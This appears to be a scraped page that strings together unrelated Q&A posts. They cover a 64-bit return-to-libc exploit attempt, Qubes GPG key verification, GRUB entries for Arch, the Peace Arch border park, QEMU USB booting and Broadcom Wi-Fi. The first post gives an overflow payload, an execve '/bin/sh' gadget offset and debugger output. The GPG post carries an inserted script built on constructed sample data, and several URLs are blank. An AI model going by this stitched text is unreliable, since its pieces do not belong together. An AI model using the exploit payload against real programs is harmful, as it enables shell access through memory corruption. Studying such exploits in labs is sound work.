Problem with return 2 libc in 64 bit arch

Good day guys, I want to perform return-to-libc on a 64-bit architecture using execve. I found a gadget with /bin/sh in it (the /bin/sh offset is 18a143):

   cbcd8:       00 00
   cbcda:       4c 89 ea                mov    rdx,r13
   cbcdd:       4c 89 e6                mov    rsi,r12
   cbce0:       48 8d 3d 5c e4 0b 00    lea    rdi,[rip+0xbe45c]        # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>
   cbce7:       e8 94 f9 ff ff          call   cb680 <execve@@GLIBC_2.2.5>
--
   cbd92:       48 85 c0                test   rax,rax

Now I fill the return address (RIP) with (address of libc + 0xcbce0) using this payload:

r $(python -c 'print "A"*120 + {libc+0xcbce0}')

Here are the registers:

RAX: 0xffffffffffffffff
RBX: 0x0
RCX: 0xffffffffffffff80
RDX: 0x0
RSI: 0x555555555060 (<_start>:  xor    ebp,ebp)
RDI: 0x7ffff7f79143 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x0
RIP: 0x7ffff7ebacef (<maybe_script_execute+175>:        mov    rax,QWORD PTR [rbp-0x28])
R8 : 0xffffffff
R9 : 0x8a
R10: 0x7fffffffdfb0 ('A' <repeats 120 times>, "443777")
R11: 0x202
R12: 0x555555555060 (<_start>:  xor    ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0

and here is the code around execve:

   0x7ffff7ebace0 <maybe_script_execute+160>:   lea    rdi,[rip+0xbe45c]        # 0x7ffff7f79143
   0x7ffff7ebace7 <maybe_script_execute+167>:   call   0x7ffff7eba680 <execve>
   0x7ffff7ebacec <maybe_script_execute+172>:   mov    rsp,rbx
   0x7ffff7ebacef <maybe_script_execute+175>:   mov    rax,QWORD PTR [rbp-0x28]
   0x7ffff7ebacf3 <maybe_script_execute+179>:   sub    rax,QWORD PTR fs:0x28
   0x7ffff7ebacfc <maybe_script_execute+188>:   jne    0x7ffff7ebad4b <maybe_script_execute+267>
   0x7ffff7ebacfe <maybe_script_execute+190>:   lea    rsp,[rbp-0x18]
   0x7ffff7ebad02 <maybe_script_execute+194>:   pop    rbx

but it does not work and gives a bus error. Thanks for your help.

Why is Debian not showing the GPG signatures on keys that Arch Linux is?

I downloaded a Qubes OS ISO and I’m trying to verify its legitimacy using this guide. GPG was behaving weirdly, so I created a separate user with a separate keyring to reproduce the issue.

When I try to verify the key on my Debian system, the signature on the release signing key is not there:

$ gpg --fetch-keys
gpg: directory '/home/test/.gnupg' created
gpg: keybox '/home/test/.gnupg/pubring.kbx' created
gpg: requesting key from ''
gpg: /home/test/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg:               imported: 1
$ gpg --fetch-keys
gpg: requesting key from ''
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: Total number processed: 1
gpg:               imported: 1
$ gpg --list-sigs "Qubes OS"
pub   rsa4096 2017-03-06 [SC]
      5817A43B283DE5A9181A522E1848792F9E2795E9
uid           [ unknown] Qubes OS Release 4 Signing Key
sig 3        1848792F9E2795E9 2017-03-06  Qubes OS Release 4 Signing Key
$

I expected another line with a signature from the master key, such as

sig          DDFA1A3E36879494 2017-03-08  Qubes Master Signing Key 

Surprised, I decided to check on another system. This one is running Arch Linux. I trust it less than the Debian system. Perplexingly, the signature does show up — the output is just as above, but with the added signature line.

The GPG version is 2.2.17 on both machines.

What could be causing this discrepancy?
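An added check, not part of the original question: rather than eyeballing `--list-sigs`, a script can read the machine-readable `--with-colons` listing and assert that the release key carries a certification from the master key ID quoted above. The two listings below are constructed samples (key IDs and fingerprint are the ones in the question; timestamps and the uid hash are made up).

```shell
# Added example (not from the original question): test whether a key's
# machine-readable listing carries a certification from a given signer.
# In `gpg --with-colons` output, 'sig' records have the record type in
# field 1, the signer's key ID in field 5 and the signature class in field 11.

# Constructed sample of `gpg --with-colons --list-sigs "Qubes OS"` as the
# Arch box shows it: self-signature plus the master-key certification.
ARCH_LISTING='pub:-:4096:1:1848792F9E2795E9:1488758400:::-:::scSC::::::23::0:
fpr:::::::::5817A43B283DE5A9181A522E1848792F9E2795E9:
uid:-::::1488758400::0000000000000000000000000000000000000000::Qubes OS Release 4 Signing Key::::::::::0:
sig:::1:1848792F9E2795E9:1488758400::::Qubes OS Release 4 Signing Key:13x:::::2:
sig:::1:DDFA1A3E36879494:1488931200::::Qubes Master Signing Key:10x:::::2:'

# The same key as the Debian box lists it: only the self-signature survives.
DEBIAN_LISTING=$(printf '%s\n' "$ARCH_LISTING" | grep -v 'DDFA1A3E36879494')

# has_sig_from LISTING SIGNER_KEYID
# Exit status 0 when a 'sig' record from SIGNER_KEYID is present, 1 otherwise.
has_sig_from() {
    printf '%s\n' "$1" | awk -F: -v want="$2" '
        $1 == "sig" && $5 == want { found = 1 }
        END { exit(found ? 0 : 1) }'
}

# count_sigs LISTING: number of certification records on the key.
count_sigs() {
    printf '%s\n' "$1" | awk -F: '$1 == "sig" { n++ } END { print n + 0 }'
}

# Against a live keyring (needs gpg; not run here):
#   has_sig_from "$(gpg --with-colons --list-sigs 'Qubes OS Release 4')" DDFA1A3E36879494 \
#       && echo "master-key certification present" || echo "certification MISSING"
```

Run against the real keyring on both machines, the function returns 0 only where the master key's certification was actually imported, which makes the discrepancy scriptable instead of a matter of reading two listings side by side.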

Ubuntu grub os probe creating bad entry for Arch

I recently did a new build, and wanted Arch on it – I have heard good things about it. Naturally, I also wanted a few others on there to make sure I had something I ‘knew’ how to run. Neither Ubuntu 18.04.2 nor Ubuntu 19.04 was capable of creating a grub entry that could boot Arch, even though they both found it.

Apparently they got fooled by the existence of a microcode update in EFI boot, and attempted to initrd ONLY the microcode, not initramfs-linux.img as exists in the Arch boot setup. I have tried editing the grub.cfg (yes, I know that is not persistent) just to see if that was the (entire) problem, and it appears to be so. The question then, is how do I fix it in a persistent manner?

Thoughts that occur are an attempt to modify the 30_ entry in /etc/default so it works better – skipping 30_ and doing a 40_custom for the other distros – using another boot loader? Is there an even better way – that doesn’t require modifying each additional distro after installation, perhaps? I would hate to have to add “/initramfs-linux.img” to the Arch entries in grub.cfg over and over…

Peace Arch without exiting USA

For the purposes of this question, assume I am of a legal status which prevents me from exiting the US. I have a friend who I would like to visit, but they’re unable to secure a US Visa, though they can secure a Canadian one.

My friend and I decide to meet at the Peace Arch, and my friend crosses over to the US side of the park, but I do not.

Would it be possible to meet this friend, exchange pleasantries, and perhaps a hug, without technically exiting the US from the eyes of US immigration? Would I have to talk to CBP when I leave the park?

How to boot an Arch USB device in QEMU and save to a VM?

I’m trying to get an Arch Linux QEMU-KVM hypervisor going.

I used the same USB that I originally used to install Arch Linux on my machine, using Rufus on my Windows machine to set up the Arch Linux ISO on it.

sudo qemu-system-x86_64 -enable-kvm -nographic -m 384 \
    -drive file=/dev/sdb,format=raw,index=0,media=disk \
    -hda /media/guestos/webServer/image.qcow2

where /dev/sdb is the USB and /dev/sda5 is mounted at /media/guestos/webServer.

If I include the last line, I get this error:

qemu-system-x86_64: -hda /media/guestos/webServer/image.qcow2: drive with bus=0, unit=0 (index=0) exists 

If I remove the last line, the USB is able to start booting, but it doesn’t show anything after it says “loading archlinux.iso”.

If I boot my normal OS, it says OK a bunch of times at the part where QEMU stops. When I’m running QEMU the screen just shows a flashing pointer in the top left and that’s it.

How do I fully boot from the USB in QEMU? For the initial setup, do I have to include the .qcow2 image I plan to save it to in my startup command, or am I able to switch to console mode and save it through that?

How to manually create a wireless interface for an Arch Linux computer

I have recently installed Arch for the first time, and I am having extreme difficulty setting up my Wi-Fi. The physical hardware and drivers are there, and listed by the computer:

$ lspci -k
---snipped---
0c:00.0 Network controller: Broadcom Inc. and subsidiaries BCM4312 802.11b/g LP-PHY (rev 01)
    Subsystem: Dell Wireless 1397 WLAN Mini-Card
    Kernel driver in use: b43-pci-bridge
    Kernel modules: ssb

and this is the output of ip link:

$ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: enp0s25: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN mode DEFAULT group default qlen 1000
    link/ether 00:24:e8:9f:a2:a3 brd ff:ff:ff:ff:ff:ff
00:00.0

See the problem? There is a device and drivers, but no wlan0 interface. Now, I have read a few articles about it, but none had circumstances like mine. What is the recommended way to do this (I have wifi-menu installed, but it is having issues)? Are there files I can create, or will I need to do something more along the lines of

$ ip address add

Thank you. If this question is not direct, please advise me on a more educated question.